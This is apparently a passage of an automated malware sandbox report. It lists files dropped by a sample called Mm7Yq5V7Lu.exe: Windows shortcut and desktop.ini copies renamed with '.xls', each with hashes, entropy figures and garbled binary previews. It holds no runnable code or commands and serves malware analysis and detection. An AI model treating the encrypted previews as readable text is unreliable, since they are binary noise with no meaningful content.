                                                                                                                                                      Preview: D..}.d.F.W.^%.....}L.~...g...X.....D.......X....U...R'..SBI0...~.aG....x#:....Bo.1.U*W.....oG....K.C.....*%..!j(.k.!I?.]...US.%.....l.'.Z..E}..waw..=G...LQZs....w-..`..}.v.Gy.......r..w.}..x..pi...... #.q50.c..%....+."!~v5zH.....R......`...h..].~.a.u.3x.g.q..o.._!..`.We..7}.B.r....0.#.n'/4..R+ma..^w<>..7..'$..<%mC.)...%.g...]T.'....,.....Y,....,.]...rAsQ.Z.....N.$.u.L..9s.@.<p..V.oM,..G....|.`L.\.gt..A..(.Q.)br.t......T6kzq..C...NfKS.>.."...H?w....#.W.....3;............[B.&......TT...^....z<..n.3M;..5z,,w..T.._....w.....0.^.!....t.$.f..`'g.G....G1.e........I.......v.......Z. I....]ac-.xl@..V`.....^..YD.L").a(.Q......F.8.R....7.........u.p9."..Z...o.%-U.6..].9uSI.Q..K0.t.....fXh@..,....-...[Y#.Y...wc.L.1*....m..$.r. .G.MT.[.(..C[..q..1.x..7T.M.&.........t..'L..c.........(..HM.>yZvKK.1K.m`i..% .(w..b..q`.aS....;.%@Pp..p[....U......!....?..1I.K..~W..Ly.2.A^T..F.Wa.9...f.h..A.=..G......?~M..!D.B+/....JA..Lj.T.p.Y+.QA..|.....p.....
                                                                                                                                                      C:\Users\user\Start Menu\Programs\System Tools\Control Panel.lnk.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1360
                                                                                                                                                      Entropy (8bit):6.256971752113864
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TB0r0ouys9NE1VzK8sevWAVgKTaCB7RZ0cHYIgtyUzob:V0rkFILzCwgck38N
                                                                                                                                                      MD5:A2CBD028A0F19749F278461A4BE1A581
                                                                                                                                                      SHA1:AB8DA2E91FA3DB89FBE331EA3A2722836A2E2E0E
                                                                                                                                                      SHA-256:9B7A74AC0DEDF08E682D9B66BDEB8F592680627D95038017556F1BFA0AB7C3DD
                                                                                                                                                      SHA-512:08B94DF306C78BD71803B4068E2E403BD336FC6D8E587B45E780E0D3A4886AEE108BBF8F8FD6220D79FCAF4D3F36E90095A8B6CA72BAD0AC576D28095B25842D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: D...2.'T.Ts.....p...n.S'0...-U..l1....VU..y.....q..t4(.)}T..Cm..F..n A........r=...|...V...A.$...{..dI[._$.A\`.. D...1..U..?.b......t..Sy.B..fV..'...h.tWMW4g....h9.t.....=...u..w..>....h.f.g.H*..."..2.Q`..:........(...;X...P.r.-'y.O.......{M}.r.b...yd.w.[...<\%D.=^(...$...u....H6.......!.......>...!.....at.:9........".;C.+K$B.t.'...90R.4aX..d..v.{.P.l..:F.O{...~..B..$s.ol....Od..2.....#hyq..>L..4'q..%V./....$,..`.~..........?.U.....9..!..g...........#.....:H.rK.........W..........~..1...&..}f....c4N.....67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4
                                                                                                                                                      C:\Users\user\Start Menu\Programs\System Tools\Desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1744
                                                                                                                                                      Entropy (8bit):6.819336350548717
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:WIdd+nSajbn4Mstzv60gdmwIgYUVtVDFF0TWNBuzK8sevWAVgKTaCB7RZ0cHYIg+:WIYSajbBszCJrNVDFF0T+uzCwgck38J
                                                                                                                                                      MD5:8096621B55721AAFB23FF56B292DCFDC
                                                                                                                                                      SHA1:0A5985F0F5D3FACFF066354B4093F6685AD3E33B
                                                                                                                                                      SHA-256:6608ED55C7A3627DD95A867E169E286A21245055C91A549EEB99580DA968CB61
                                                                                                                                                      SHA-512:11BC0B32F30F1DCB3820133F895BD49325F16CFDF860D4F26FB339FC696D803DDBBF32B73592203009029E6AF563590A3730C0450EE690E4881387B995FA4F1B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ....^.-,...[....1%..&s.X\.....v..., 4S.4.t.S.^.....#,.8.LZ.R..Y.O......|_..Q..v.s=QP...)....8I.;(.45JO'I+.no>._y....6.o......9S.@....{...-fE...IJ.].Y.....Y....c7.QRJ...b..)k..E....o.J...w].y...v.|....<r......!"...h..})...P.!........B.?..RC.<.c..JJ#...j..]..+.......(.t...Uu.=.j..QN..OL...B..~.{...a..Q...z...8x'q5M.t...4fk.@.a.h.](o...H9.'.....HB.].)..l...F2...^9y.=r7.!b.<....a...?+.-"..q...L..V)w,.XOO..|...N.k8..V...*[.w...|....(.!./(...1...d.8.?P.^5M.v.v.3.....W`mW...O.....{l.NP.n.z..Qw00Sb.........>.|.h0JK'..l3.kfe...Pb.......y...<...........r.iy!.}.=.........\6Ki.....B....'.f.......oM/..7N.?H......m...Jn".T.NW.E..0........2..O.]._.C.;.g.......^{D......w.....4.NfF.|a.`...oc.`S<..@a.2..hM..N44.=X..,...>.`.zY.......<....t..<....d$.......y.#.T..R/.VL.+,......a.7/...N.[G..X............}.]0..Wq....`..x..u...ji...N.y.....b...~....H-X.{n.".z.c}}.=....E....._,....tP,.N^..B.z67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6
                                                                                                                                                      C:\Users\user\Start Menu\Programs\System Tools\File Explorer.lnk.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1360
                                                                                                                                                      Entropy (8bit):6.232825898097978
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:dCOOrC+XVxch8EQ+OzVtY8I0qIvL6zK8sevWAVgKTaCB7RZ0cHYIgtyUzd3J:QOOmeHEQ+OK6L6zCwgck3863J
                                                                                                                                                      MD5:4C53229CF3106D77C04F332F350A54DB
                                                                                                                                                      SHA1:29ADFD2659187DF41FDC9FA254248F4F9355E2F0
                                                                                                                                                      SHA-256:76038F932929960805AFFB6B47E660C9EE58BCC0263D6F51D651BFFF8CD957BC
                                                                                                                                                      SHA-512:0B20707BB555077E633CA6B66D6FB2BE7EDE6E3545DCF477294774E7C44D869CE7347BF9FBE715F355BB633A27A8A8D239992E6229AE9FE91EED9DD8CD292C5A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .M{..N5e..fr?.....#%.~..[.(.....2B.zm....+..u.gk...-.w.)......1...5........eU1bc.h..b.t..=Zv#NN...>...3...E..6...}d..S.?U.?...9.J"...m............._6....J.O.....k>U..(Ly......2....}..Ai1w.f.....t.T.U.........KsE...aS...V.y..u.d.m~.r5.S.d.{Dj.a.7.=.....R2..M..6.9...e.../B?.Q.Z0.%u$.W...M.`.U.zR.2m.].P;1PX.."I.>.kq.P.>-z..E..@..~...6....K...p.f.p..`&.U.d..n.<P.z..UKO._U.vQ..[...Q....I#..Ky..QC..g_M.f....D./.C...*.w..R..I..c..>(.N......l.............q#....^IkN...eh1.~.\[..%......u.........l.y..oM.gv2=Ea..!767 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4
                                                                                                                                                      C:\Users\user\Start Menu\Programs\System Tools\Run.lnk.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1360
                                                                                                                                                      Entropy (8bit):6.252683152439437
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:IJwPANSpQqEzyJ+XCu1dWU5ISHzK8sevWAVgKTaCB7RZ0cHYIgtyUzW:IyPovJSSCw5ISHzCwgck38/
                                                                                                                                                      MD5:E94195F357F97BD8FF6FF070E46D12F1
                                                                                                                                                      SHA1:67A551F22F5CE013F3646DF28893E442CCD57FD9
                                                                                                                                                      SHA-256:3C843A09096730E80B9CD4D53F4C0BD215D0FD7E52DC9BB4A7FA7253C18DFB6E
                                                                                                                                                      SHA-512:878B2B4544A2D5B4DF1ED6C039040483A113E460AD9D50ED2ED81772DC09F0688689EAEDA45E705F593C21F8C3830264B3EA66891B72E4036F08FC5F644F3C86
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: l...G....=q.K|?,.\-...'c...o.n.zKPX...<.o...L"@%S.~..]...uJ...O..l...CU......J...&.|.e..6r...d.T.......x.e0...Qz..u..../k.....-.....ul...(.......1$Z....T|....NI.\{..`.A..8......8.f..=...%...)Y!...h..J.w2..wn8;.4.'u.[..FZ=\..3.d.Z...>.?.!..L5...Y..8..j...CC..eY...0v...b=S.....#.[...@....%E.1=6%a.y....C..<...x.e...5.v4..2<w.!<.....Xk;V..me..A.n.!.3.....qB.>K_._.i..sO3.{..n........d..f.)0+.f......d4..k.W....6'..P..v.Y&HYjvu+=4heTGK+..dg=...0N.~...w^..._.M....!D7j.Oq`!.3......i_hy....>\.<.bm...[.et.......o........`.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4
                                                                                                                                                      C:\Users\user\Start Menu\Programs\System Tools\computer.lnk.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1280
                                                                                                                                                      Entropy (8bit):6.045069934504888
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:frkky01cF6j/XBQl5V6TzxzK8sevWAVgKTaCB7RZ0cHYIgtyUz78:fIkRw6XB00TdzCwgck38N
                                                                                                                                                      MD5:ED58C871B780E0525E6F077BDF8400C1
                                                                                                                                                      SHA1:273D9FA9E65F87FBAB19ED5239C74D8E2151F1E5
                                                                                                                                                      SHA-256:B8265336965D59FD84BBA968E7ECD9296DEEE08272D5449EFF2E8205689E1083
                                                                                                                                                      SHA-512:61303959D5152E6D2789E6C02F4DBD6C0B9A274F4FB7A86B2EEA3235CC11B622891BEC6F8264A974BFEB66E01FEE5881FC6199319FA2D15E0A85E0DB8FFC69D4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...!..p.....0L......(.....3.......L.onl0..v..-...iV........A.).#,..{...$.?.E.....OiuB:.&.R.oH..TPD.D.SL.D.."..I......gh...#q..2D...nq........d..-M..g.<.<.D.E.....4Af..Y`.e..S."Mil..t]......v.K...eh..E$..v5..]........hL..F.@.|.-..9..m....i~/q}$s.....j.:.>=TSb,..@....qW.w.:....'..+.v.?..d.|.:8+.fv...... 1l....8..\.M{..1...[q.uA.V.. VlV.M.4.:....t..[..I...&.X9y.w.G+../K..A.ac:M..O....(0.....8$..'>.....:....j..vA.U..!F...0;].g...z.8......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A
                                                                                                                                                      C:\Users\user\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3440
                                                                                                                                                      Entropy (8bit):7.554903022377892
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:yPgqVoCZZFdjzLhHuEf6zaAtF3Q5m1LB+brzTEN:yPgqV1dtzUPtF3QayM
                                                                                                                                                      MD5:B092E340CF730DC751EC1395321B7A95
                                                                                                                                                      SHA1:8A2E3180B16E7221678629443A95386AF905D586
                                                                                                                                                      SHA-256:2CA5BCD1CA9FADA58E85F3882374BF3B7BDCC5E92EA2E408B545A19E58BFBD7C
                                                                                                                                                      SHA-512:210DF880810054EBD940775EECD20EDB7A4CAD2E657ED1318D31426195B05614F5D812DBB6D28BD10301373AAEB009E6A22397011E69A7463153608596D332DD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..9A.....a...o....W6....6.m....o.g.g(.l...z^.;)......)PSK..0!..9O?`.1..!...S'..}.c...F?sL.....{....D.......q:da............$...m..0`\F....H.0.5....X..C.yR.tf........n.........M...P7..3....qy....3. WO..~...H.N.....m......1...)..Z.J.O3m.*......M.Fw;P.?....l..Z.^......g.9..NQs.GN..D......!.....W).hDaU...<.|H+.7d.'#.7.ub.q.TD..9w.;.yecw.....F8..E Q@.:..i-k?.....0c..y.>/.M~......-.......D!...S.9.v}2..9...4(:.Q...Z.......S.i....~8....N].,....q..i..g*....V.X.e.."....6.]{.. v.PFJ&..\...i...p.J..Z.....u..*twM......!....._..[i..$.tC..i.s......4.o...".s......\....xC. G.Ug.bW.#Yg>.@.`.......@.w..s.......A\........z.=.?l.@]......2|MX...Q.o.$........2FT.%..WN.4..Y..B]w.......|......=.,.X.;Tc;p...O..../|...6.(_K.6/..Ff..7..\..1FC........L~k-......0.D=$..N?zQ.1..\..ZL7....N..;..6.Y_.`e-.....W#.bgxV....Y.o...)o......Y$...(......'"......]......{...6.f..n.....B..Q.....I.#...t.3.8c_Y.,L4.....+....n.5.7vg..4_d.~.]..p..,E..j7:CI..].f+g;P.6.2...c.
                                                                                                                                                      C:\Users\user\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE (x86).lnk.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2224
                                                                                                                                                      Entropy (8bit):7.1791670239771115
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:vmO1maXO3onmvwrMRiVZXXuB91ubzCwgck38crfv:nXWWmvwokjX6abzTEtfv
                                                                                                                                                      MD5:7CA4E93257DEE96E2A902E1D4DE5AD88
                                                                                                                                                      SHA1:0D7AD2E87DFB4A3031E3D64F9DEEC1F30D41FFC6
                                                                                                                                                      SHA-256:9F3DD608AC7CB45214E772B778168F3C5E582BC22E18D79790318DBBB7D70540
                                                                                                                                                      SHA-512:6FC0439C09E5C3C87E773CCDFA16A8D144C9A9931364F09FD9A202FABA2E305BDF54B7F6842FBCFD8BBF0C0880EA4F655EDD60AFA4D63934B89FB633AB2C6289
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..`....O.Tm..."b:......|..K..6...t........2.cY...-u...L...mG....X..............a.(.....h./.....(.s...E..:..8...K..]a;.1.,V.\.'r..a......D...%p.t vQi.;........M.l....N....+Y.._....c...S`...S..|..).....r..<.d.Rs7`...t&...".U.S..K9@.Iv+EpZ0Ko...U.~...U;.1&...i~?y..]-..I.(.t.Y..a.`..TJ.3...c."[l..FK.O.....;,...j.v+h4=.x~ ./...n.>.co....\>^w..;rw..7.O...~.^3.....x.....1..A-...F...".<b.wt....k..{...q.d..l'...?.?.P._#.H.q......*........K.|..C.}.}.>..g.\.GD|d.{(..].o..07...'Yv13..u..x..-.wB....yI.]..U.Y........o.U......a......."..d..).......|6..!...b_A.1.b..._..N#.........J.Q..?i.wI.C.eG..Q.|.J/]..Y.o(..H:....,.....tK.....I..&v....D.K.9Pb>#[d.r...&.....x.5.).09^|.....S*tA.I.>..:SW&..}kF.,.7....^......>.@...G..OT:R....f.(...]..7h.Jh.*O...zc..#.........3...t/R.]A..[e:.]#.u........=...T&...F..f....W.....X+ =...X.}rf...x.,...q......R....o[5H....g2!'C....m+.S......6.j.T....H.=.!..j..j........\...5.....P..R.... .%8P..C...m.L..a.....X...B:..\Y.y
                                                                                                                                                      C:\Users\user\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE.lnk.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2224
                                                                                                                                                      Entropy (8bit):7.1608882751201195
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:Hi6gk5lYaRDNtA9ktyaGLBk/DzYeKfrydKK3/zCwgck38EJT:C6gNaRMQpGLBIzYe6c/zTEtT
                                                                                                                                                      MD5:038017DF758B0796E4AEB5CC0E0C418C
                                                                                                                                                      SHA1:F8BB3269BEF4CE90A1BB3F505727E999D0EE567E
                                                                                                                                                      SHA-256:62F8F14B9C07B93A87826C4DA9322C3A16F87B14506B0EDEF63750B763622086
                                                                                                                                                      SHA-512:14F47EFB28F37E8959F8D35F3484DC5453C679E106A53C635D1305B6A09D7AD5C77C717EE9A32B5293F234FFC1FC50153C754E672959C555291BCA61D68166A5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...Q...?..pA.A...pL.......:.+F./i..J.H..P..K..."..p.N.|.rz.jU)..`.WqX......[..K.H..0?c.Z..\.i.1.Z.b..V..=...P@..d....i.J/..g.r.NA}l NO..w.X.........5W....V...._QP..**......qB.~$..h....i...@.&............6..Jz.E.p.....=.#.|...7.9.wZ.(......Y(K.,....;....pV7..SZ.."d.6\.]"...........d..g.._.0.......-..j0...C.J.....0^K,R.3.k.f..W....M...e3.........6.L..0.jgS07K.Q.z.h...2..|.]....0.4[......$IA....4[m.|H^../.a/.!X.,x..TZ...:^......9:4K...k.F5..n..h....i...I.U...hu$90..X.}...M..%.8..S.}6..u5.H35..O.=.............%.3!.....o.za..z....l^.6K.k......C..d.........uD.HH..t[.)....P^Yb1\\.p..T.I...~U..7A.8....p{..E|..ZJ...JU..X.....Q#..*.p...W..9D].c..o&:....^8c....o.&.Q.8.'..7........L...(_.R..!.&.2.&}.M&g..,5.Y-w.w3.*..*K<R;`.S..n.D.......b.d...T.q. .9M.~..qUO.8..#..........m\3~.b.JF.op...........W....h...&$.!.".9C...2.8.y.E.....+......m....V.N..._...c.....7....T.~R..x....}e'0=C....b.Nny......|....;r........;..d...B..?#../70.y.%7....c....,j8....
                                                                                                                                                      C:\Users\user\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3440
                                                                                                                                                      Entropy (8bit):7.568767225918289
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:hEQVkD8AIBUx26q6UP2LUOhcWvgM/DgzTEr:hX28pUxhqb2LUOhHgEDcO
                                                                                                                                                      MD5:E85AB84D8E8AC9E8CBD654C23BEBDF88
                                                                                                                                                      SHA1:EE27333F699B852C2B1698B1C6207C0F40C61FB5
                                                                                                                                                      SHA-256:96FA5C3D55AE1E9AC01EFB80078C3F84D45AAE7CC065326FC4C3BE226AA4136F
                                                                                                                                                      SHA-512:5BFAAC5C9CC1D980FF33FBC02350975CD4912313A816D3CEA5A9E0FBC44688C185AA3C6E19B8859D33A1348A51BBA6B2744608B92C027655F041DA2FF8FC8D1E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .!G......D.T....K..gWG0..~....Eb.H....".%t..X.$.g7CX.......a.,.E"........vPrF.;..~.r...)...m..3L %Vr....3qP..=s.1...i..q..j.O..Wr.....Jp.x....Ki...?.u[.^...~..L.LJ.R.Q.]h...0.8R..h.M....MGWl..0....+........t..R.....j......u.%...A..g.F...G"..=z.Z..W.....(....~...9..^9..?...!..:....H.a..5W...B..Q..`..^.+......i...l......g.D........x...N....D.tf.Df.._.K4J.>.|....P6.?....l....K.tr.[..n}..E.yE~........8....LQ.....F".C.B.%. .a#r..a..}.$.,..Zn[.A...V*...%...U.+>M.@.ET.. .5..#..0.v.s...O-...7..wUv..6.....DE.J.....@.....m9.L..s..z<.{....{...%.2...U.3`o."..=K....g>sS..~Vk.iA..d.];c5.....h.a...S.0.'....K..f.V.kv.l.. ..F..>.Xi..~..LZ&(}IW.......X.z.u.&M...*n.........ZG.AA....U.`.Z.&urXAx.kd..<..I!...c...Z.....b+.P.|$(I.k....3.;..a.9.=.oM.._p...z..S..Q...q..H..9.E.@ol....'...$...".B./)...7d.GT.C.8...L...Y.m...[.&rMn!M...QDx.R..S..@..k.....AJ.V...s....T8...\.....L.....5.........>)?..L....F.....A.....s(zu..<.:.03.=f..X.....6.A.J.H..U=...Gt....^.
                                                                                                                                                      C:\Users\user\Start Menu\Programs\Windows PowerShell\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.778910268506134
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:ndBRWH82w7lSH2zK8sevWAVgKTaCB7RZ0cHYIgtyUzakH:nz0cbBSWzCwgck38zkH
                                                                                                                                                      MD5:0260CFD663074E0037C81361B7D1EE23
                                                                                                                                                      SHA1:FE9AEC2A5204F5C464840755B2937C2B226CB2D5
                                                                                                                                                      SHA-256:ECDADC97D701E619AD737646EA7DFAB26084273851822B51A31C8E2DB3629B35
                                                                                                                                                      SHA-512:0CE0DED9A53BFEF39388A4BC4A9F8DC7DF847E34C139F84923E0A50299CFACA73BE0D42430034A04A8037D5F261B301E1F820106C7DDFF20AA0FF55E8DE5F89C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..t\.>..P,DI..5`fGr9%;.5I......V...t@p..z..Vm..c.....C....Wkc_.c<Ns_.x*.....f.M..9E....,.....q...?..2...:k.......mF....\.26z.#.8..X.}.....N...+.r......~.x....-.U....pSmR..K..".i.(.}.mO...#...Ia.......N.$>..*.\T.3w.V.*.%.}...#..;;.D...8.. .w.....C.M.U.,:..........f.*.=...C...M.o...)\.f......v...m.!i.......{.....=J....:.5G....z..>.....j67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\Start Menu\Programs\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1216
                                                                                                                                                      Entropy (8bit):5.937381373635444
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:IRygR3n8HxXZteeF0zK8sevWAVgKTaCB7RZ0cHYIgtyUzJd:sy4KdR0zCwgck38O
                                                                                                                                                      MD5:A481AD968457CD4911643E4640FDA383
                                                                                                                                                      SHA1:83E9B9405A23A17A6909328FF7211DAC18CF8789
                                                                                                                                                      SHA-256:A7042F96ABDAFC2BCDA6CB2EE816B671E6EA88E58955BC86D7B1E230CC0F122B
                                                                                                                                                      SHA-512:87C5285A7D8940E20ACE976A0154C21DC4798049FFE4806B8C5752BF2E2F023E3828EB9747632146FE0E5AC92B5246DAFC38ECC8587D38B153E35CE0242E41DA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: %..R...[Qg...#...Jg.}l...`..c.*...u..<s.An.C...+...]....8.$.Ae.m.n.Z=>`...T.<...G.=`.........K.k^.^...{..(?Xe.8P~...@}J...@..X&Xm...'..H../=....^.j.b...+.7......g.h.|.G.Q@.?..s.B..zQ...*..xX..E;..*:b..v.....P<..3.Zk^6.`..D-..IW...l...*a}..Um.tR.2..$...(.$.V,..c.b.y..t3?us...5.2.Yv<*.uI.h.X..)..m.,......K....~.}.i.Y(......8..(i.....M..n..[.> .-Ra.~..;vr)T`...7%..... .q....+.@._.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4
                                                                                                                                                      C:\Users\user\Start Menu\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1120
                                                                                                                                                      Entropy (8bit):5.641429795846516
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:pcy+HFXQY0q8rZm7kzK8sevWAVgKTaCB7RZ0cHYIgtyUz5D:p+lXQfqKw7kzCwgck38o
                                                                                                                                                      MD5:B3834D184240418BFCB62122F8439918
                                                                                                                                                      SHA1:03BAF1227246D384DA6F186A9AF180A84F86D02A
                                                                                                                                                      SHA-256:5BEF232272667CB283E028D4BF86AD3C4ECAB15565572CA8B2AB7299DF029808
                                                                                                                                                      SHA-512:286242B93E9D99EC826D3EC3E84E14819C3F65802447EB0D958582E5E684DC30F72EA6CABB611ED6F96D0D3998FFD13389F87415D1096D506DCA321E8D4A39C9
                                                                                                                                                      Malicious:false
